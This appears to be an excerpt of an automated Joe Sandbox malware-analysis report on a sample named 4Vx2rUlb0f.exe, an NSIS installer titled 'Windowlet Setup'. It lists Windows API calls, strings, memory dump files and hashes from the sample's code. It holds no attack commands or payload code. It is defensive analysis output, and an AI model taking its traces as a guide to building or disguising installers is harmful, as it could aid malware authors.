                                                                                                                                • CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                                                • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                                                                Strings
                                                                                                                                • *?|<>/":, xrefs: 00406336
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
                                                                                                                                • "C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 004062E4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                • String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 589700163-4284022603
                                                                                                                                • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                • Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
                                                                                                                                • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                • Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404198
                                                                                                                                • GetSysColor.USER32(00000000), ref: 004041B4
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041C0
                                                                                                                                • SetBkMode.GDI32(?,?), ref: 004041CC
                                                                                                                                • GetSysColor.USER32(?), ref: 004041DF
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 004041EF
                                                                                                                                • DeleteObject.GDI32(?), ref: 00404209
                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404213
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                • Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
                                                                                                                                • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                • Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
                                                                                                                                APIs
                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                  • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C
                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                • String ID: 9
                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                • Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                                                                • Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
                                                                                                                                • Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                                                                • Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
                                                                                                                                • GetMessagePos.USER32 ref: 00404A9C
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404AB6
                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                • String ID: f
                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                • Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
                                                                                                                                • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                • Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
                                                                                                                                APIs
                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                • MulDiv.KERNEL32(000BE687,00000064,000BE68B), ref: 00402D4D
                                                                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                Strings
                                                                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                • Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                                                                • Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
                                                                                                                                • Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                                                                • Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                • Opcode ID: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                                                                • Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
                                                                                                                                • Opcode Fuzzy Hash: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                                                                • Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                • Opcode ID: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                                                                • Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
                                                                                                                                • Opcode Fuzzy Hash: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                                                                • Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
                                                                                                                                APIs
                                                                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                • Opcode ID: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                                                                • Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
                                                                                                                                • Opcode Fuzzy Hash: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                                                                • Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                                                                • wsprintfW.USER32 ref: 00404A15
                                                                                                                                • SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                • Opcode ID: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                                                                • Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
                                                                                                                                • Opcode Fuzzy Hash: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                                                                • Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
                                                                                                                                APIs
                                                                                                                                • SetWindowTextW.USER32(00000000,Windowlet Setup), ref: 00403C07
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: TextWindow
                                                                                                                                • String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$1033$Windowlet Setup
                                                                                                                                • API String ID: 530164218-867710217
                                                                                                                                • Opcode ID: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                                                                • Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
                                                                                                                                • Opcode Fuzzy Hash: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                                                                • Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll,?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll
                                                                                                                                • API String ID: 3109718747-3636328232
                                                                                                                                • Opcode ID: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
                                                                                                                                • Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
                                                                                                                                • Opcode Fuzzy Hash: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
                                                                                                                                • Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
